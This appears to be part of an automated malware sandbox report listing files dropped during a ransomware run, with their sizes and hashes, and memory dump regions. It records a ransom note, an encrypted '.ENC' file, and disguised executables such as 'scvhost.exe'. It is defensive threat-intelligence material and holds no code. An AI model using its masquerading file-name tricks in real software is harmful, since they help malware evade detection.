SHA5125b71d394878d19652525d5f465528c9f263feafa4714f7f2f72edbae6e17211bb046373fbe87726bcdcd1bd50d28994de6b30d3ab797f5b4af815dbc19619290
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5b260491e0ba425d42eae0a6f7e5be166
SHA11c2821e3ccbb3445ef89a2213f38bdd0d49e49ae
SHA256b8244b449976461ddb6ee680590c89051418b638602b1203d064404fa9aefbc9
SHA51270e7c67eeae156db4d11660f6c3372713cf2bb83e188b5464311d429625273d449fe155f061c1538824131b500e1d65fa6acf6e56b765ea862bc73af0fb1e451
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD58c76712e8d3413a409d53d4fce9a2ef4
SHA1e4600f2e1a7e163214bb5b99928573afb64ce3f5
SHA25698b8516d6f5fd26c3f0e15bd41515a3e7cf8988c79d6b8a3b68c61e06473a5fd
SHA5120dac8e86394533a10352b7d6d81cd4485f6346cc84b74044ac7ef7862b283d1108ac69410e2d1ca5d8eddbc6d89b153de28a7f53cb101a6bd70d351efad99a9b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5e5663972c1caaba7088048911c758bf3
SHA13462dea0f9c2c16a9c3afdaef8bbb1f753c1c198
SHA2569f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e
SHA512ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD50aa63dbb46d451e47a7a682c64af776d
SHA13b0026f2dae8e9c491ccaa40133755779de35aaa
SHA2569158038718d41172c22a3c1a15852405e3e1c8e2c44fa066328eb1520e5d977b
SHA5124d2564850c2ab1bc71089412f19147df4a1cd3075aa2039aa894271b333cd9c510b7ba4d70889f24d45d8b366d8b5167abdcf24314e4753420337c7d34e7c43f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ade8b780188478d4bf68c97bc995b06f
SHA10b5124fca500da8f833a3be98bd5f732d3962343
SHA256318ce58720b7608811b1177c41ce0f7ec0437783db8ed188acbc523d08a3646b
SHA512c9d19f196b25e62bb6f717c46ec892b18d243646afdae4b848ce30802d1df4e5576bf6328ac88ce8bca01f17fed79da778ecfeb770fe0bcc14d167ad577fcc13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcbjw42h.hkb.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\mshta.exeFilesize
70KB
MD5c5431c4b11742bc4ab73e896dd47153b
SHA116e6869c71d4ee978dfcc29b48f277f55828a331
SHA256bc404ae20b7085100cd7a7efddb28ce54014309bdbd60a5d57c135d44b950c4a
SHA512888a843e81400b900fb5a36ff171b03149d2719406e778614809cfaaa7e81e2e9deb6807d01ff1cec7ed1db30b585121fc8606d2bc52ffc5fc4d86e9d2b12f37
-
C:\Users\Admin\AppData\Local\Temp\scvhost.exeFilesize
63KB
MD51ca366d46cb1726508257459a9cbbf3f
SHA1183e7cd4165bd195cb05c7e474037f2a22707c67
SHA25676bb01ad0452e2f834661d54744645a14d057be883ad51d2b447f8d6c48d5129
SHA512aec28910c3f2015ea252d9e2c1a497eec8fd3ef0bc4ff0bf42a593f159a3539df8ec7b01487def04099ca68040ec3d484492319b7bfbafedcbd7bcc2627e67be
-
C:\Users\Admin\AppData\Roaming\Windows_Log_79.batFilesize
292KB
MD5cf1da3f20349f15bfacf7c271d60684c
SHA1ad4a58069d800ca900c5752929aa92d5d87fe3c7
SHA256ee6dc82f435a2224bcc30034bb5c5827d4470078f5238bf2f6e5a5023528d24f
SHA5128743be3187c9a080cc8fb6ec7243ff98f3d157c4e884503045bc56b0d042ef9a81a127c92a8f80d00b899f3e92c11f9877bd3bdf6c7eeb863d1bb503830cdccd
-
C:\Users\Admin\AppData\Roaming\Windows_Log_79.vbsFilesize
114B
MD5f615b865b89d6fca3489d69259aafb5b
SHA11cfa88e74aab33ae68a459efcd6ea555a06879f3
SHA2569848f4bb516ef9e3ccb06f85f77b42f6b8ed37244e227a7cc36d26819cd4e1de
SHA512ef9015602f5602f93370689b58fc8457f0ab1daf38ab8cd3bff49eabe9c84acfd62be9108448d45bddbac3fb2839cf12fc876984c20a678494ef3677cf736d37
-
C:\Users\Admin\Desktop\How To Decrypt My Files.htmlFilesize
639B
MD5d2dbbc3383add4cbd9ba8e1e35872552
SHA1020abbc821b2fe22c4b2a89d413d382e48770b6f
SHA2565ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be
SHA512bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66
-
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENCFilesize
16B
MD50dd236afd1221fd580963ddb2386e0e0
SHA1094231d6cce22b826ff2268e77821c1999f34a1a
SHA256660aa028e60bc170b254a6aac6c0ff56f599224d447b20558ed367d3dbf45d05
SHA512f62681a3be7995e34b00d048d3e17f53dc10a07eb15907f3ebc3d68162f690577b970c9fbedff1430e51d6a20f4ffa9fc276744257d3b563434204529b9020f5
-
\??\pipe\LOCAL\crashpad_924_OQOSYKDLIPCMOHRGMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1128-122-0x00000170606B0000-0x00000170606BC000-memory.dmpFilesize
48KB
-
memory/1128-53-0x00000170606C0000-0x00000170606DA000-memory.dmpFilesize
104KB
-
memory/3356-74-0x0000000000F50000-0x0000000000F66000-memory.dmpFilesize
88KB
-
memory/3828-15-0x000001FA57C80000-0x000001FA57C88000-memory.dmpFilesize
32KB
-
memory/3828-48-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3828-6-0x000001FA57C20000-0x000001FA57C42000-memory.dmpFilesize
136KB
-
memory/3828-11-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3828-0-0x00007FFCB4233000-0x00007FFCB4235000-memory.dmpFilesize
8KB
-
memory/3828-12-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3828-13-0x000001FA57CA0000-0x000001FA57CE4000-memory.dmpFilesize
272KB
-
memory/3828-14-0x000001FA580E0000-0x000001FA58156000-memory.dmpFilesize
472KB
-
memory/3828-16-0x000001FA58060000-0x000001FA580A8000-memory.dmpFilesize
288KB
-
memory/3868-31-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3868-18-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3868-19-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/3868-29-0x00007FFCB4230000-0x00007FFCB4CF1000-memory.dmpFilesize
10.8MB
-
memory/4572-120-0x000000001CAB0000-0x000000001CABE000-memory.dmpFilesize
56KB
-
memory/4572-75-0x0000000000C60000-0x0000000000C78000-memory.dmpFilesize
96KB